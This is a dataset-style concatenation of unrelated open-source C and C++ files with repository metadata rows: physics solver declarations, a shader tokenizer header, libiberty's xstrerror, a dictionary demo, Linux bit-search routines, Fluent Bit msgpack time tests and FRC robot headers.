static void computeJT_x_parallel_unopt(Eigen::VectorXd &Mrtilde, const Eigen::VectorXd &LHSJqd, Eigen::VectorXd &Mr, const Eigen::VectorXd &MJqd, Eigen::VectorXd &fr, const Eigen::VectorXd &fm_MJdqd, const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S);
static void preprocess_preconditioner_unopt(std::unique_ptr<StateSolve> &SS, std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S, bool blkdiag);
static Eigen::VectorXd computeMinv_x_unopt(const Eigen::VectorXd &x, const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S, std::shared_ptr<State::local_mt> lmt = nullptr);
static void preprocess_PCG(std::unique_ptr<StateSolve> &SS, std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S);
static void computeJ_Jdot_x(Eigen::VectorXd &J_x, Eigen::VectorXd &Jdot_x, const Eigen::VectorXd &x, const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S);
static void computeJ_x(Eigen::VectorXd &J_x, const Eigen::VectorXd &x, const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S);
static Eigen::VectorXd computeM_x(const Eigen::VectorXd &x, const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S);
static Eigen::VectorXd computeLHS_x(const Eigen::VectorXd & x, const std::unique_ptr<StateSolve>& SS, const std::unique_ptr<LinkageSystem>& LS, const std::unique_ptr<State>& S);
static void computeStiffnessDampingJoint(Eigen::VectorXd &LHSx, const Eigen::VectorXd & qdot, const Eigen::VectorXd & q, std::unique_ptr<StateSolve>& SS, const std::unique_ptr<LinkageSystem>& LS, const std::unique_ptr<State>& S);
static Eigen::VectorXd computeJT_x(const Eigen::VectorXd &x, const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S, std::shared_ptr<State::local_mt> lmt = nullptr);
static void preprocess_PCG_preconditioner(std::unique_ptr<StateSolve> &SS, std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S, bool blkdiag);
static Eigen::VectorXd computeMinv_x(const Eigen::VectorXd &x, const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S, std::shared_ptr<State::local_mt> lmt = nullptr);
private:
ConstraintJoint() {};
static void updateJacobian(std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S);
};
#endif
| 79.794118 | 315 | 0.753962 |
2cbe768b7630e4c12c75c00746039d63038087e2 | 718 | h | C | shadercooker-lib/ShaderCooker/Token.h | avennstrom/NovusCore-Common | f0687f0df75c0651137d11bb14aba6fede918d93 | [
"MIT"
] | 9 | 2020-03-16T09:52:08.000Z | 2021-09-03T20:05:04.000Z | shadercooker-lib/ShaderCooker/Token.h | avennstrom/NovusCore-Common | f0687f0df75c0651137d11bb14aba6fede918d93 | [
"MIT"
] | 3 | 2020-01-16T13:58:24.000Z | 2020-08-04T19:38:32.000Z | shadercooker-lib/ShaderCooker/Token.h | avennstrom/NovusCore-Common | f0687f0df75c0651137d11bb14aba6fede918d93 | [
"MIT"
] | 7 | 2020-01-16T13:55:27.000Z | 2021-12-20T22:15:49.000Z | #pragma once
#include <string>
namespace ShaderCooker
{
class Token
{
public:
enum class Type : uint16_t
{
COMMA = 44,
SEMICOLON = 59,
ASSIGN = 61,
LBRACKET = 91,
RBRACKET = 93,
IDENTIFIER = 256,
KEYWORD_PERMUTATION,
KEYWORD_INCLUDE,
// Custom Special/Operator Types
STRING,
// Alias
PARAM_SEPERATOR = COMMA,
END_OF_LINE = SEMICOLON,
NONE = 999
};
Type type = Type::NONE;
size_t lineNum = 0;
size_t colNum = 0;
std::string_view stringview;
uint32_t hash = 0;
};
} | 18.894737 | 44 | 0.470752 |
309a5de46634f84b79c654bc8d04f0452fae481f | 1,954 | c | C | 30days-Origin-ISOfiles/omake/tolsrc/go_0023s/libiberty/xstrerror.c | sky5454/30daysMakeOS-Origin-ISOfiles | 502da405cbcd4cfd2fab236c6bf62a9323196ee0 | [
"Info-ZIP"
] | 43 | 2019-06-26T10:22:39.000Z | 2022-03-25T02:26:43.000Z | go_0023s/libiberty/xstrerror.c | HariboteOS/tolset | ac2aa0f5bd9492f48b1721de73ad831cdd8216aa | [
"Xnet",
"X11"
] | 7 | 2016-12-29T12:07:29.000Z | 2019-05-20T07:06:42.000Z | go_0023s/libiberty/xstrerror.c | HariboteOS/tolset | ac2aa0f5bd9492f48b1721de73ad831cdd8216aa | [
"Xnet",
"X11"
] | 23 | 2019-09-07T15:44:51.000Z | 2022-03-16T07:42:20.000Z | /* xstrerror.c -- jacket routine for more robust strerror() usage.
Fri Jun 16 18:30:00 1995 Pat Rankin <rankin@eql.caltech.edu>
This code is in the public domain. */
/*
@deftypefn Replacement char* xstrerror (int @var{errnum})
Behaves exactly like the standard @code{strerror} function, but
will never return a @code{NULL} pointer.
@end deftypefn
*/
#include "../include/stdio.h"
/* !kawai! */
#include "../include/libiberty.h"
/* end of !kawai! */
#include "config.h"
#include "../include/errno.h"
#if !defined (__STRICT_ANSI__) && !defined (__HIDE_FORBIDDEN_NAMES)
extern char *strerror PARAMS ((int,...));
#define DONT_DECLARE_STRERROR
#endif
#ifndef DONT_DECLARE_STRERROR
extern char *strerror PARAMS ((int));
#endif
/* If strerror returns NULL, we'll format the number into a static buffer. */
#define ERRSTR_FMT "undocumented error #%d"
static char xstrerror_buf[sizeof ERRSTR_FMT + 20];
/* Like strerror, but result is never a null pointer. */
char *
xstrerror (errnum)
int errnum;
{
char *errstr;
#ifdef VMS
char *(*vmslib_strerror) PARAMS ((int,...));
/* Override any possibly-conflicting declaration from system header. */
vmslib_strerror = (char *(*) PARAMS ((int,...))) strerror;
/* Second argument matters iff first is EVMSERR, but it's simpler to
pass it unconditionally. `vaxc$errno' is declared in <errno.h>
and maintained by the run-time library in parallel to `errno'.
We assume that `errnum' corresponds to the last value assigned to
errno by the run-time library, hence vaxc$errno will be relevant. */
errstr = (*vmslib_strerror) (errnum, vaxc$errno);
#else
errstr = strerror (errnum);
#endif
/* If `errnum' is out of range, result might be NULL. We'll fix that. */
if (!errstr)
{
sprintf (xstrerror_buf, ERRSTR_FMT, errnum);
errstr = xstrerror_buf;
}
return errstr;
}
| 28.318841 | 79 | 0.669396 |
01a40dd8e23c22f401f02120dc2f6568faa7420a | 700 | c | C | dict/main.c | rakanalh/all-things-c | 2107925d37aa3eeee6e7df562d83f81850383364 | [
"MIT"
] | null | null | null | dict/main.c | rakanalh/all-things-c | 2107925d37aa3eeee6e7df562d83f81850383364 | [
"MIT"
] | null | null | null | dict/main.c | rakanalh/all-things-c | 2107925d37aa3eeee6e7df562d83f81850383364 | [
"MIT"
] | null | null | null | #include <stdio.h>
#include <stdint.h>
#include "dict.h"
int main(int argc, char** argv) {
dict* dict = dict_new();
printf("Setting values\n");
dict_set(dict, "name", "Rakan");
dict_set(dict, "age", (void *) (intptr_t) 15);
printf("Reading values\n");
dict_entry* name = dict_get(dict, "name");
dict_entry* age = dict_get(dict, "age");
if(name != NULL) {
printf("Name is: %s\n", (char*) name->value);
}
if(age != NULL) {
printf("Age is: %ld\n", (intptr_t) age->value);
}
dict_entry* entry = NULL;
dict_foreach(dict, entry) {
printf("key is %s\n", entry->key);
}
printf("Deleting values\n");
dict_del(dict, "age");
printf("Clear dict\n");
dict_free(dict);
return 0;
}
| 19.444444 | 49 | 0.62 |
a4e2980b49212b7639c3eba2c57a7461a7bac61a | 9,855 | c | C | tests/internal/flb_time.c | blkmajik/fluent-bit | 552af7ab958ed77884ba0fc838979c2d62a4c95d | [
"Apache-2.0"
] | 1 | 2020-01-21T09:56:45.000Z | 2020-01-21T09:56:45.000Z | tests/internal/flb_time.c | blkmajik/fluent-bit | 552af7ab958ed77884ba0fc838979c2d62a4c95d | [
"Apache-2.0"
] | 5 | 2022-02-24T18:40:08.000Z | 2022-03-26T16:12:27.000Z | tests/internal/flb_time.c | blkmajik/fluent-bit | 552af7ab958ed77884ba0fc838979c2d62a4c95d | [
"Apache-2.0"
] | null | null | null | /* -*- Mode: C; tab-width: 4; indent-tabs-mode: nil; c-basic-offset: 4 -*- */
/* Fluent Bit
* ==========
* Copyright (C) 2019-2021 The Fluent Bit Authors
* Copyright (C) 2015-2018 Treasure Data Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <fluent-bit.h>
#include <fluent-bit/flb_time.h>
#include <fluent-bit/flb_pack.h>
#include <mpack/mpack.h>
#include <msgpack.h>
#include <msgpack/timestamp.h>
#include "flb_tests_internal.h"
#define SEC_32BIT 1647061992 /* 0x622c2be8 */
#define NSEC_32BIT 123000000 /* 123ms 0x0754d4c0 */
#define D_SEC 1647061992.123;
const char eventtime[8] = {0x62, 0x2c, 0x2b, 0xe8, 0x07, 0x54, 0xd4, 0xc0 };
void test_to_nanosec()
{
uint64_t expect = 123000000456;
uint64_t ret;
struct flb_time tm;
flb_time_set(&tm, 123, 456);
ret = flb_time_to_nanosec(&tm);
if (!TEST_CHECK(ret == expect)) {
TEST_MSG("given =%" PRIu64, ret);
TEST_MSG("expect =%" PRIu64, expect);
}
}
/* https://github.com/fluent/fluent-bit/issues/5215 */
void test_append_to_mpack_v1() {
mpack_writer_t writer;
char *data;
size_t size;
struct flb_time tm;
int ret;
msgpack_zone mempool;
msgpack_object ret_obj;
size_t off = 0;
flb_time_set(&tm, 123, 456);
mpack_writer_init_growable(&writer, &data, &size);
ret = flb_time_append_to_mpack(&writer, &tm, FLB_TIME_ETFMT_V1_FIXEXT);
if (!TEST_CHECK(ret == 0)) {
TEST_MSG("flb_time_append_to_mpack failed");
mpack_writer_destroy(&writer);
flb_free(data);
exit(EXIT_FAILURE);
}
mpack_writer_destroy(&writer);
msgpack_zone_init(&mempool, 1024);
ret = msgpack_unpack(data, size, &off, &mempool, &ret_obj);
if (!TEST_CHECK(ret == MSGPACK_UNPACK_SUCCESS)) {
TEST_MSG("unpack failed ret = %d", ret);
msgpack_zone_destroy(&mempool);
flb_free(data);
exit(EXIT_FAILURE);
}
if (!TEST_CHECK(ret_obj.type == MSGPACK_OBJECT_EXT)) {
TEST_MSG("data type is not ext. type=%d", ret_obj.type);
msgpack_zone_destroy(&mempool);
flb_free(data);
exit(EXIT_FAILURE);
}
if (!TEST_CHECK(ret_obj.via.ext.type == 0)) {
TEST_MSG("ext type is not 0. ext type=%d", ret_obj.via.ext.type);
msgpack_zone_destroy(&mempool);
flb_free(data);
exit(EXIT_FAILURE);
}
msgpack_zone_destroy(&mempool);
flb_free(data);
}
void test_msgpack_to_time_int()
{
struct flb_time tm;
int64_t expect = SEC_32BIT;
int ret;
msgpack_packer mp_pck;
msgpack_sbuffer mp_sbuf;
msgpack_unpacked result;
msgpack_object tm_obj;
/* create int object*/
msgpack_sbuffer_init(&mp_sbuf);
msgpack_packer_init(&mp_pck, &mp_sbuf, msgpack_sbuffer_write);
msgpack_pack_int(&mp_pck, expect);
msgpack_unpacked_init(&result);
msgpack_unpack_next(&result, mp_sbuf.data, mp_sbuf.size, NULL);
tm_obj = result.data;
ret = flb_time_msgpack_to_time(&tm, &tm_obj);
if(!TEST_CHECK(ret == 0)) {
TEST_MSG("flb_time_msgpack_to_time failed");
exit(EXIT_FAILURE);
}
if (!TEST_CHECK(tm.tm.tv_sec == expect && tm.tm.tv_nsec == 0)) {
TEST_MSG("got %ld.%ld, expect %ld.%d", tm.tm.tv_sec, tm.tm.tv_nsec, expect, 0);
}
msgpack_sbuffer_destroy(&mp_sbuf);
msgpack_unpacked_destroy(&result);
}
void test_msgpack_to_time_double()
{
struct flb_time tm;
double d_time = D_SEC;
int64_t expect_sec = SEC_32BIT;
int64_t expect_nsec = NSEC_32BIT;
int ret;
msgpack_packer mp_pck;
msgpack_sbuffer mp_sbuf;
msgpack_unpacked result;
msgpack_object tm_obj;
/* create int object*/
msgpack_sbuffer_init(&mp_sbuf);
msgpack_packer_init(&mp_pck, &mp_sbuf, msgpack_sbuffer_write);
msgpack_pack_double(&mp_pck, d_time);
msgpack_unpacked_init(&result);
msgpack_unpack_next(&result, mp_sbuf.data, mp_sbuf.size, NULL);
tm_obj = result.data;
ret = flb_time_msgpack_to_time(&tm, &tm_obj);
if(!TEST_CHECK(ret == 0)) {
TEST_MSG("flb_time_msgpack_to_time failed");
exit(EXIT_FAILURE);
}
if (!TEST_CHECK(tm.tm.tv_sec == expect_sec &&
llabs(tm.tm.tv_nsec - expect_nsec ) < 10000 /* 10us*/)) {
TEST_MSG("got %ld.%ld, expect %ld.%ld", tm.tm.tv_sec, tm.tm.tv_nsec, expect_sec, expect_nsec);
}
msgpack_sbuffer_destroy(&mp_sbuf);
msgpack_unpacked_destroy(&result);
}
void test_msgpack_to_time_eventtime()
{
struct flb_time tm;
int64_t expect_sec = SEC_32BIT;
int64_t expect_nsec = NSEC_32BIT;
char ext_data[8] = {0};
int ret;
msgpack_packer mp_pck;
msgpack_sbuffer mp_sbuf;
msgpack_unpacked result;
msgpack_object tm_obj;
memcpy(&ext_data[0], &eventtime[0], 8);
/* create int object*/
msgpack_sbuffer_init(&mp_sbuf);
msgpack_packer_init(&mp_pck, &mp_sbuf, msgpack_sbuffer_write);
/* https://github.com/fluent/fluentd/wiki/Forward-Protocol-Specification-v1#eventtime-ext-format */
msgpack_pack_ext(&mp_pck, 8/*fixext8*/, 0);
msgpack_pack_ext_body(&mp_pck, ext_data, sizeof(ext_data));
msgpack_unpacked_init(&result);
msgpack_unpack_next(&result, mp_sbuf.data, mp_sbuf.size, NULL);
tm_obj = result.data;
ret = flb_time_msgpack_to_time(&tm, &tm_obj);
if(!TEST_CHECK(ret == 0)) {
TEST_MSG("flb_time_msgpack_to_time failed");
exit(EXIT_FAILURE);
}
if (!TEST_CHECK(tm.tm.tv_sec == expect_sec &&
llabs(tm.tm.tv_nsec - expect_nsec ) < 10000 /* 10us*/)) {
TEST_MSG("got %ld.%ld, expect %ld.%ld", tm.tm.tv_sec, tm.tm.tv_nsec, expect_sec, expect_nsec);
}
msgpack_sbuffer_destroy(&mp_sbuf);
msgpack_unpacked_destroy(&result);
}
void test_msgpack_to_time_invalid()
{
struct flb_time tm;
char ext_data[8] = {0x00, 0x11, 0x22, 0xaa, 0xbb, 0xcc, 0xdd, 0xee};
int ret;
msgpack_packer mp_pck;
msgpack_sbuffer mp_sbuf;
msgpack_unpacked result;
msgpack_object tm_obj;
/* create int object*/
msgpack_sbuffer_init(&mp_sbuf);
msgpack_packer_init(&mp_pck, &mp_sbuf, msgpack_sbuffer_write);
msgpack_pack_ext(&mp_pck, 5 /* invalid size */, 0);
msgpack_pack_ext_body(&mp_pck, ext_data, 5);
msgpack_unpacked_init(&result);
msgpack_unpack_next(&result, mp_sbuf.data, mp_sbuf.size, NULL);
tm_obj = result.data;
/* Check if ext */
TEST_CHECK(tm_obj.type == MSGPACK_OBJECT_EXT);
TEST_CHECK(tm_obj.via.ext.type == 0);
TEST_CHECK(tm_obj.via.ext.size == 5);
ret = flb_time_msgpack_to_time(&tm, &tm_obj);
if(!TEST_CHECK(ret != 0)) {
TEST_MSG("flb_time_msgpack_to_time should fail");
exit(EXIT_FAILURE);
}
msgpack_sbuffer_destroy(&mp_sbuf);
msgpack_unpacked_destroy(&result);
/* create int object*/
msgpack_sbuffer_init(&mp_sbuf);
msgpack_packer_init(&mp_pck, &mp_sbuf, msgpack_sbuffer_write);
msgpack_pack_ext(&mp_pck, 8, 10 /* invalid type */);
msgpack_pack_ext_body(&mp_pck, ext_data, 8);
msgpack_unpacked_init(&result);
msgpack_unpack_next(&result, mp_sbuf.data, mp_sbuf.size, NULL);
tm_obj = result.data;
/* Check if ext */
TEST_CHECK(tm_obj.type == MSGPACK_OBJECT_EXT);
TEST_CHECK(tm_obj.via.ext.type == 10);
TEST_CHECK(tm_obj.via.ext.size == 8);
ret = flb_time_msgpack_to_time(&tm, &tm_obj);
if(!TEST_CHECK(ret != 0)) {
TEST_MSG("flb_time_msgpack_to_time should fail");
exit(EXIT_FAILURE);
}
msgpack_sbuffer_destroy(&mp_sbuf);
msgpack_unpacked_destroy(&result);
}
void test_append_to_msgpack_eventtime()
{
struct flb_time tm;
int ret;
char expect_data[8] = {0};
msgpack_packer mp_pck;
msgpack_sbuffer mp_sbuf;
msgpack_unpacked result;
msgpack_object tm_obj;
memcpy(&expect_data[0], &eventtime[0], 8);
tm.tm.tv_sec = SEC_32BIT;
tm.tm.tv_nsec = NSEC_32BIT;
/* create int object*/
msgpack_sbuffer_init(&mp_sbuf);
msgpack_packer_init(&mp_pck, &mp_sbuf, msgpack_sbuffer_write);
ret = flb_time_append_to_msgpack(&tm, &mp_pck, FLB_TIME_ETFMT_V1_FIXEXT);
if(!TEST_CHECK(ret == 0)) {
TEST_MSG("flb_time_append_to_msgpack failed");
exit(EXIT_FAILURE);
}
msgpack_unpacked_init(&result);
msgpack_unpack_next(&result, mp_sbuf.data, mp_sbuf.size, NULL);
tm_obj = result.data;
/* Check if Eventtime */
TEST_CHECK(tm_obj.type == MSGPACK_OBJECT_EXT);
TEST_CHECK(tm_obj.via.ext.type == 0);
TEST_CHECK(tm_obj.via.ext.size == 8);
if (!TEST_CHECK(memcmp(&expect_data[0], tm_obj.via.ext.ptr, 8) == 0) ) {
TEST_MSG("got 0x%x, expect 0x%x", *(uint32_t*)tm_obj.via.ext.ptr, *((uint32_t*)&expect_data[0]));
}
msgpack_sbuffer_destroy(&mp_sbuf);
msgpack_unpacked_destroy(&result);
}
TEST_LIST = {
{ "flb_time_to_nanosec" , test_to_nanosec},
{ "flb_time_append_to_mpack_v1" , test_append_to_mpack_v1},
{ "msgpack_to_time_int" , test_msgpack_to_time_int},
{ "msgpack_to_time_double" , test_msgpack_to_time_double},
{ "msgpack_to_time_eventtime" , test_msgpack_to_time_eventtime},
{ "msgpack_to_time_invalid" , test_msgpack_to_time_invalid},
{ "append_to_msgpack_eventtime" , test_append_to_msgpack_eventtime},
{ NULL, NULL }
};
| 29.330357 | 105 | 0.672146 |
01123875b048f753be2a825d47ae112b16acb654 | 1,635 | h | C | opengl.superbible.6th.example.codes/include/dropDownList.h | pgrPcz/pgrSuperBible6 | 59e73fff6877695bec9fb647a37ab29b995362a6 | [
"MIT"
] | null | null | null | opengl.superbible.6th.example.codes/include/dropDownList.h | pgrPcz/pgrSuperBible6 | 59e73fff6877695bec9fb647a37ab29b995362a6 | [
"MIT"
] | null | null | null | opengl.superbible.6th.example.codes/include/dropDownList.h | pgrPcz/pgrSuperBible6 | 59e73fff6877695bec9fb647a37ab29b995362a6 | [
"MIT"
] | null | null | null | #ifndef __DROPDOWNLIST_H__
#define __DROPDOWNLIST_H__
#include "GL/gl3w.h"
#include "GL/glfw.h"
#include "sb6ext.h"
#include <vmath.h>
#include <stdio.h>
#include <fstream>
class DropDownList {
public:
DropDownList();
~DropDownList();
void Init(int winW, int winH, float x, float y, int width, int hight, const char * bitmap,int numOfElementsInList);
void Render(double currentTime);
void UpdateSize(int winW, int winH);
void ShoutDown();
bool CheckArea(int x, int y);
bool onMouseButton(int a, int b);
int GetCurrentElement();
void ChangeToElement(int index);
int activeElement;
void SetCurrentElement(int index);
private:
void WinLog(const wchar_t *text, int n);
GLuint LoadBMPTexture(const char * imagepath);
void generate_texture(float * data, int width, int height);
void SetProjMat(int w, int h);
void SetWinSize(int w, int h);
void SetColor(bool mouseStatus);
int winWidth, winHeight;
float width, height;
float x, y;
int iwidth, iheight;
int ix, iy;
int mousePosX, mousePosY;
int numOfElements;
int currentElement;
float offsetValue;
bool insideWholeArea;
bool insideBtnArea;
bool btnClicked;
const char * TexturePath;
unsigned char * textureData;
unsigned int fileWidth, fileHeight;
GLuint program;
GLuint vao;
GLuint positionBuffer;
GLuint texCoordBuffer;
GLuint indexBuffer;
GLint mv_location;
GLint proj_location;
GLint btnColor;
GLuint tex_object;
GLuint textureID;
float aspect;
vmath::mat4 proj_matrix;
vmath::vec4 color;
};
#endif /* __DROPDOWNLIST_H__ */ | 18.579545 | 116 | 0.700917 |
60231916b4251ab3000bdebd6e75fb2caf787744 | 7,542 | h | C | src/problem.h | sraaphorst/nibac | 288fcc4012065cf8b15dab4fc5f0c829b2b4a65c | [
"Apache-2.0"
] | null | null | null | src/problem.h | sraaphorst/nibac | 288fcc4012065cf8b15dab4fc5f0c829b2b4a65c | [
"Apache-2.0"
] | 9 | 2018-05-06T20:27:49.000Z | 2018-10-24T23:28:24.000Z | src/problem.h | sraaphorst/nibac | 288fcc4012065cf8b15dab4fc5f0c829b2b4a65c | [
"Apache-2.0"
] | null | null | null | /**
* problem.h
*
* By Sebastian Raaphorst, 2003 - 2018.
*/
#ifndef PROBLEM_H
#define PROBLEM_H
#include "common.h"
#include "bacoptions.h"
#include "branchingscheme.h"
#include "formulation.h"
#include "group.h"
#include "margotbacoptions.h"
#include "solutionmanager.h"
namespace vorpal::nibac {
/** An abstract framework for constructing problems for the BAC library.
* While it is not necesssary to use this class, it does provide a standardized approach
* to constructing a problem. and streamlines the approach, ensuring that everything is
* done in the correct order. For examples of concrete implementations of this class, see
* the design and intersectingsetsystem examples.
*/
class Problem {
public:
const static int FREE;
const static int FIXEDTO0;
const static int FIXEDTO1;
protected:
// The B&C options.
BACOptions &options;
// The type of problem.
Formulation::ProblemType problemType;
Formulation::SolutionType solutionType;
// The number of variables.
int numberVariables;
// The number of branching variables.
int numberBranchingVariables;
// A list of variables for the problem that allows fixings to be specified.
// fixings[i] = FREE (default) indicates that a variable is free.
// fixings[i] = FIXEDTO0 indicates that a variable is fixed to 0.
// fixings[i] = FIXEDTO1 indicates that a variable is fixed to 1.
// Imposing a fixing on variables will alter the variable order, which is
// fine. The order will still be respected by the VariableOrder, but will
// be modified so that the variables fixed to 1 appear before all other
// variables, followed by those fixed to 0, followed by the free variables.
int *fixingFlags;
// The problem formulation.
Formulation formulation;
// The symmetry group. Default value is null, in which case, BAC will be used instead
// of MargotBAC.
Group *group;
// Perform any necessary initialization on the problem.
// This method is currently empty, as most tasks that must be done here will be
// handled either in the constructor or will already have been established in the
// BACOptions.
virtual void initialize(void);
// Construct the formulation.
// NOTE: No fixings should be performed here. This will be taken care of by NIBAC
// by setting the fixingFlags member.
virtual void constructFormulation(void) = 0;
// NOTE ABOUT FIXINGS.
// The programmer should not manually configure the BACOptions initial fixings sets. This
// will be handled by Problem, and instead the programmer using Problem should focus on
// the fixingFlags. Ultimately, whether or not manual fixings are specified through
// CommandLineProcessing, the program is used without CommandLineProcessing and without
// Problem and the sets in BACOptions are configured by the programmer, or Problem is
// used and the programmer configures fixingFlags, the same effect will be achieved.
// Set up the fixing flags for the problem. The default implementation of this method assumes
// no fixings unless specifically dictated by the user (i.e. BACOptions::getManualFixings()).
// If no manual fixings have been set up, it invokes the determineFixingFlags() method, which
// allows the programmer to manually configure this array, which has size numberVariables and
// is indexed by variables.
//
// While programmers may override this method, they are STRONGLY cautioned against doing so.
// Not doing so will ensure consistent behaviour across all subclasses of Problem.
virtual void setupFixingFlags(void);
// Set up the fixingFlags member array, which is passed in.
// Initially, this array is initialized entirely to FREE, so only the variables to be set to
// 0 or 1 need to be explicitly set to FIXEDTO0 or FIXEDTO1 respectively. The default
// implementation of this does nothing, i.e. all variables are left free.
virtual void determineFixingFlags(int *);
// Establish an initial base for the symmetry group given the variable fixings.
// The implementation of this method in this class handles this task automatically based
// on the fixingFlags and the variable order in the BACOptions, choosing the best base
// for the SchreierSimsScheme with regards to these considerations (F_1 F_0 F, with
// each block sorted according to variable order).
//
// While programmers may override this method, they are STRONGLY cautioned against doing so.
// If necessary, ensure that all functionality performed by this method is properly duplicated.
virtual void establishInitialBase(int *);
// Construct the symmetry group for the problem.
// This default method simply sets the group to the null pointer, i.e.
// implying that we want to run pure B&C. The group can either be constructed
// explicitly, or discovered dynamically using the methods of GeneratedGroup,
// or conveniently by using one of the subclasses of SchreierSimsGroup.
// Note that any subgroup of the symmetry group can be specified, although specifying
// a proper subgroup will likely result in the output of isomorphic solutions.
//
// Call establishInitialBase to get the base for the group.
virtual void constructSymmetryGroup(void);
// This method is called after the problem is solved, and provides a chance for the programmer
// to convert solutions in characteristic vector format into one that makes more sense to the
// program user (e.g. unrank block indices, etc). In the default implementation, it does nothing.
virtual void processSolutions(void);
public:
// NOTE: Before these constructors are called, they rely on the BACOptions / MargotBACOptions
// to be fully configured and populated. This can easily be done by using the convenience
// class, CommandLineProcessing, which provides a standard way to accept command line
// parameters and offer a variety of different cut producers, solution managers, variable
// orders, branching schemes, etc. If one does not wish to offer command line invocation
// or does not wish to allow the user such specific configuration, this is not necessary,
// of course, and one need only configure the options by hand. This should not be too
// difficult, as sensible defaults are usually provided, although the aforementioned
// cut producers, solution manager, variable order, and branching scheme will need to
// be set up.
Problem(BACOptions &, Formulation::ProblemType, Formulation::SolutionType, int, int= -1);
virtual ~Problem();
// This method invokes all of the previously defined ones in the appropriate order, creates the
// algorithm, solves the problem, and then processes the solutions. The solutions themselves
// are not output, and this must be handled by the calling code.
virtual void solve(void);
// Retrieve the number of variables.
inline int getNumberVariables(void) const { return numberVariables; }
};
};
#endif
| 50.959459 | 105 | 0.694776 |
6059557067b4e4210f6fe9f21fc14bc949aaa6c4 | 2,728 | c | C | linux-2.6.16-unmod/arch/sparc64/lib/find_bit.c | ut-osa/syncchar | eba20da163260b6ae1ef3e334ad2137873a8d625 | [
"BSD-3-Clause"
] | null | null | null | linux-2.6.16-unmod/arch/sparc64/lib/find_bit.c | ut-osa/syncchar | eba20da163260b6ae1ef3e334ad2137873a8d625 | [
"BSD-3-Clause"
] | null | null | null | linux-2.6.16-unmod/arch/sparc64/lib/find_bit.c | ut-osa/syncchar | eba20da163260b6ae1ef3e334ad2137873a8d625 | [
"BSD-3-Clause"
] | 1 | 2019-05-14T16:36:45.000Z | 2019-05-14T16:36:45.000Z | #include <linux/bitops.h>
/**
* find_next_bit - find the next set bit in a memory region
* @addr: The address to base the search on
* @offset: The bitnumber to start searching at
* @size: The maximum size to search
*/
unsigned long find_next_bit(const unsigned long *addr, unsigned long size,
unsigned long offset)
{
const unsigned long *p = addr + (offset >> 6);
unsigned long result = offset & ~63UL;
unsigned long tmp;
if (offset >= size)
return size;
size -= result;
offset &= 63UL;
if (offset) {
tmp = *(p++);
tmp &= (~0UL << offset);
if (size < 64)
goto found_first;
if (tmp)
goto found_middle;
size -= 64;
result += 64;
}
while (size & ~63UL) {
if ((tmp = *(p++)))
goto found_middle;
result += 64;
size -= 64;
}
if (!size)
return result;
tmp = *p;
found_first:
tmp &= (~0UL >> (64 - size));
if (tmp == 0UL) /* Are any bits set? */
return result + size; /* Nope. */
found_middle:
return result + __ffs(tmp);
}
/* find_next_zero_bit() finds the first zero bit in a bit string of length
* 'size' bits, starting the search at bit 'offset'. This is largely based
* on Linus's ALPHA routines, which are pretty portable BTW.
*/
unsigned long find_next_zero_bit(const unsigned long *addr,
unsigned long size, unsigned long offset)
{
const unsigned long *p = addr + (offset >> 6);
unsigned long result = offset & ~63UL;
unsigned long tmp;
if (offset >= size)
return size;
size -= result;
offset &= 63UL;
if (offset) {
tmp = *(p++);
tmp |= ~0UL >> (64-offset);
if (size < 64)
goto found_first;
if (~tmp)
goto found_middle;
size -= 64;
result += 64;
}
while (size & ~63UL) {
if (~(tmp = *(p++)))
goto found_middle;
result += 64;
size -= 64;
}
if (!size)
return result;
tmp = *p;
found_first:
tmp |= ~0UL << size;
if (tmp == ~0UL) /* Are any bits zero? */
return result + size; /* Nope. */
found_middle:
return result + ffz(tmp);
}
unsigned long find_next_zero_le_bit(unsigned long *addr, unsigned long size, unsigned long offset)
{
unsigned long *p = addr + (offset >> 6);
unsigned long result = offset & ~63UL;
unsigned long tmp;
if (offset >= size)
return size;
size -= result;
offset &= 63UL;
if(offset) {
tmp = __swab64p(p++);
tmp |= (~0UL >> (64-offset));
if(size < 64)
goto found_first;
if(~tmp)
goto found_middle;
size -= 64;
result += 64;
}
while(size & ~63) {
if(~(tmp = __swab64p(p++)))
goto found_middle;
result += 64;
size -= 64;
}
if(!size)
return result;
tmp = __swab64p(p);
found_first:
tmp |= (~0UL << size);
if (tmp == ~0UL) /* Are any bits zero? */
return result + size; /* Nope. */
found_middle:
return result + ffz(tmp);
}
| 21.3125 | 98 | 0.61217 |
28725fe981233d6521844647afc4d951005c5d58 | 1,798 | h | C | src/main/include/Swerve/SwerveMath.h | Mattbenfield9755/Robot-Code-2021 | dbd43b98dad1c837fb6cfc9ff48fe7eec9ce2470 | [
"BSD-3-Clause"
] | null | null | null | src/main/include/Swerve/SwerveMath.h | Mattbenfield9755/Robot-Code-2021 | dbd43b98dad1c837fb6cfc9ff48fe7eec9ce2470 | [
"BSD-3-Clause"
] | null | null | null | src/main/include/Swerve/SwerveMath.h | Mattbenfield9755/Robot-Code-2021 | dbd43b98dad1c837fb6cfc9ff48fe7eec9ce2470 | [
"BSD-3-Clause"
] | null | null | null |
#pragma once
#include <math.h>
#include "frc/WPILib.h"
/**
* This class handles the calculations required to drive a robot using SwerveDrive
* wheels. This class supports both robot centric and field centric modes. Field
